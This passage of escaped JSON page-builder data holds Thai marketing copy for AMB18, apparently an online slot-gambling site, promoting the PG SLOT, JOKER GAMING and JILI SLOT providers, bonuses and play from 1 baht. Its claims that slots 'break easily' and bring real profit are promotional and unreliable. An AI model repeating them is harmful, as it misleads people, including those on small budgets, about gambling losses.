\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e04\\u0e48\\u0e32\\u0e22\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\n\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a455b44\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e08\\u0e38\\u0e14\\u0e41\\u0e02\\u0e47\\u0e07\\u0e2d\\u0e35\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e02\\u0e2d\\u0e07 AMB18 \\u0e2a\\u0e38\\u0e14\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32<\\/span> <span style=\\\"font-weight: 400;\\\">\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e31\\u0e07\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49 <\\/span><b>\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e27\\u0e47\\u0e1a \\u0e15\\u0e23\\u0e07 \\u0e41\\u0e15\\u0e01 \\u0e07\\u0e48\\u0e32\\u0e22 \\u0e25\\u0e48\\u0e32\\u0e2a\\u0e38\\u0e14 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e23\\u0e27\\u0e1a\\u0e23\\u0e27\\u0e21\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\u0e08\\u0e32\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e21\\u0e32\\u0e44\\u0e27\\u0e49\\u0e43\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e43\\u0e2b\\u0e49\\u0e27\\u0e38\\u0e48\\u0e19\\u0e27\\u0e32\\u0e22 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e23\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e14\\u0e31\\u0e07\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22 \\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e08\\u0e31\\u0e14\\u0e08\\u0e49\\u0e32\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e16\\u0e35\\u0e48 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e0b\\u0e34\\u0e23\\u0e4c\\u0e1f\\u0e40\\u0e27\\u0e2d\\u0e23\\u0e4c\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e19\\u0e32\\u0e19 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e40\\u0e27\\u0e2d\\u0e23\\u0e4c\\u0e0a\\u0e31\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e17\\u0e35\\u0e48\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e1b\\u0e25\\u0e48\\u0e2d\\u0e22\\u0e2d\\u0e2d\\u0e01\\u0e21\\u0e32\\u0e08\\u0e36\\u0e07\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e30\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e25\\u0e48\\u0e32\\u0e2a\\u0e38\\u0e14\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e43\\u0e04\\u0e23 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e2b\\u0e32\\u0e23\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"933afcf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21 PG SLOT<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07\\u0e43\\u0e19\\u0e04\\u0e48\\u0e32\\u0e22\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\u0e17\\u0e35\\u0e48\\u0e02\\u0e32\\u0e14\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49\\u0e04\\u0e37\\u0e2d PG SLOT \\u0e0b\\u0e36\\u0e48\\u0e07\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e04\\u0e21\\u0e0a\\u0e31\\u0e14\\u0e41\\u0e25\\u0e30\\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e2d\\u0e25\\u0e31\\u0e07\\u0e01\\u0e32\\u0e23 \\u0e40\\u0e01\\u0e21\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e21\\u0e35\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e41\\u0e25\\u0e30\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e01\\u0e23\\u0e30\\u0e15\\u0e38\\u0e49\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e27\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e01\\u0e47\\u0e1a\\u0e01\\u0e33\\u0e44\\u0e23 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e2d\\u0e31\\u0e15\\u0e23\\u0e32\\u0e01\\u0e32\\u0e23\\u0e08\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e21\\u0e14\\u0e38\\u0e25 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e16\\u0e36\\u0e07\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07\\u0e01\\u0e32\\u0e23\\u0e17\\u0e35\\u0e48\\u0e17\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e01\\u0e21\\u0e08\\u0e32\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49\\u0e08\\u0e36\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e43\\u0e19\\u0e04\\u0e38\\u0e13\\u0e20\\u0e32\\u0e1e\\u0e41\\u0e25\\u0e30\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21 JOKER GAMING<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">JOKER GAMING \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e35\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e32\\u0e22\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e23\\u0e39\\u0e49\\u0e08\\u0e31\\u0e01\\u0e01\\u0e31\\u0e19\\u0e14\\u0e35\\u0e43\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e18\\u0e35\\u0e21\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e41\\u0e19\\u0e27\\u0e40\\u0e2d\\u0e40\\u0e0a\\u0e35\\u0e22\\u0e44\\u0e1b\\u0e08\\u0e19\\u0e16\\u0e36\\u0e07\\u0e15\\u0e30\\u0e27\\u0e31\\u0e19\\u0e15\\u0e01\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e44\\u0e14\\u0e49\\u0e15\\u0e32\\u0e21\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e15\\u0e19\\u0e40\\u0e2d\\u0e07 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e16\\u0e39\\u0e01\\u0e1e\\u0e31\\u0e12\\u0e19\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1a\\u0e19\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e35\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e20\\u0e32\\u0e1e \\u0e20\\u0e32\\u0e1e\\u0e44\\u0e21\\u0e48\\u0e01\\u0e23\\u0e30\\u0e15\\u0e38\\u0e01 \\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19 \\u0e01\\u0e32\\u0e23\\u0e17\\u0e35\\u0e48\\u0e17\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e36\\u0e07\\u0e40\\u0e01\\u0e21\\u0e08\\u0e32\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e2a\\u0e23\\u0e34\\u0e21\\u0e17\\u0e31\\u0e1e \\u0e08\\u0e36\\u0e07\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1e\\u0e25\\u0e15\\u0e1f\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e23\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e25\\u0e38\\u0e49\\u0e19\\u0e01\\u0e33\\u0e44\\u0e23\\u0e41\\u0e1a\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e43\\u0e19\\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e17\\u0e35\\u0e48\\u0e40\\u0e23\\u0e49\\u0e32\\u0e43\\u0e08<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21 JILI SLOT<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">JILI SLOT \\u0e42\\u0e14\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e43\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e40\\u0e19\\u0e49\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e41\\u0e1b\\u0e25\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e2b\\u0e25\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e21\\u0e35\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e0b\\u0e49\\u0e2d\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e41\\u0e1a\\u0e1a\\u0e04\\u0e32\\u0e14\\u0e44\\u0e21\\u0e48\\u0e16\\u0e36\\u0e07 \\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e17\\u0e31\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e22 \\u0e42\\u0e17\\u0e19\\u0e2a\\u0e35\\u0e2a\\u0e14\\u0e43\\u0e2a \\u0e14\\u0e36\\u0e07\\u0e14\\u0e39\\u0e14\\u0e2a\\u0e32\\u0e22\\u0e15\\u0e32 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e21\\u0e48\\u0e19\\u0e48\\u0e32\\u0e40\\u0e1a\\u0e37\\u0e48\\u0e2d \\u0e19\\u0e2d\\u0e01\\u0e08\\u0e32\\u0e01\\u0e19\\u0e35\\u0e49\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e28\\u0e36\\u0e01\\u0e29\\u0e32\\u0e41\\u0e19\\u0e27\\u0e17\\u0e32\\u0e07\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u00a0<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cbf6885\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-1-1-1.webp\",\"id\":351,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ff86a53\",\"elType\":\"widget\",\"settings\":{\"title\":\" AMB18 \\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e21\\u0e31\\u0e19\\u0e2a\\u0e4c \\u0e41\\u0e21\\u0e49\\u0e21\\u0e35\\u0e07\\u0e1a\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14 \\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e01\\u0e47\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e34\\u0e2a\\u0e23\\u0e30 \\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 1 \\u0e1a\\u0e32\\u0e17\\n\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"55e80bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e07\\u0e1a\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19\\u0e27\\u0e48\\u0e32\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e21\\u0e31\\u0e19\\u0e2a\\u0e4c\\u0e41\\u0e21\\u0e49\\u0e21\\u0e35\\u0e07\\u0e1a\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14 \\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e01\\u0e47\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e34\\u0e2a\\u0e23\\u0e30\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 1 \\u0e1a\\u0e32\\u0e17\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e19\\u0e15\\u0e48\\u0e33\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e27\\u0e1a\\u0e04\\u0e38\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e44\\u0e14\\u0e49\\u0e07\\u0e48\\u0e32\\u0e22\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e15\\u0e32\\u0e21\\u0e07\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e07\\u0e27\\u0e25\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33\\u0e2a\\u0e39\\u0e07\\u0e40\\u0e01\\u0e34\\u0e19\\u0e44\\u0e1b \\u0e01\\u0e32\\u0e23\\u0e1a\\u0e23\\u0e34\\u0e2b\\u0e32\\u0e23\\u0e17\\u0e38\\u0e19\\u0e08\\u0e36\\u0e07\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e22\\u0e37\\u0e14\\u0e2b\\u0e22\\u0e38\\u0e48\\u0e19 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1c\\u0e31\\u0e19\\u0e1c\\u0e27\\u0e19 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e0a\\u0e2d\\u0e1a\\u0e41\\u0e15\\u0e01\\u0e1a\\u0e48\\u0e2d\\u0e22\\u0e41\\u0e1a\\u0e1a\\u0e01\\u0e33\\u0e44\\u0e23\\u0e40\\u0e25\\u0e47\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e01\\u0e47\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e44\\u0e14\\u0e49\\u0e15\\u0e32\\u0e21\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e23\\u0e27\\u0e21\\u0e01\\u0e31\\u0e1a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e25\\u0e48\\u0e2d\\u0e07\\u0e15\\u0e31\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2cd57df\",\"elType\":\"widget\",\"settings\":{\"title\":\"AMB18 \\u0e41\\u0e2b\\u0e25\\u0e48\\u0e07\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2e\\u0e34\\u0e15 \\u0e19\\u0e48\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1a\\u0e19 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21 \\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e40\\u0e01\\u0e21\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e17\\u0e35\\u0e48\\u0e04\\u0e27\\u0e23\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49e7be0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 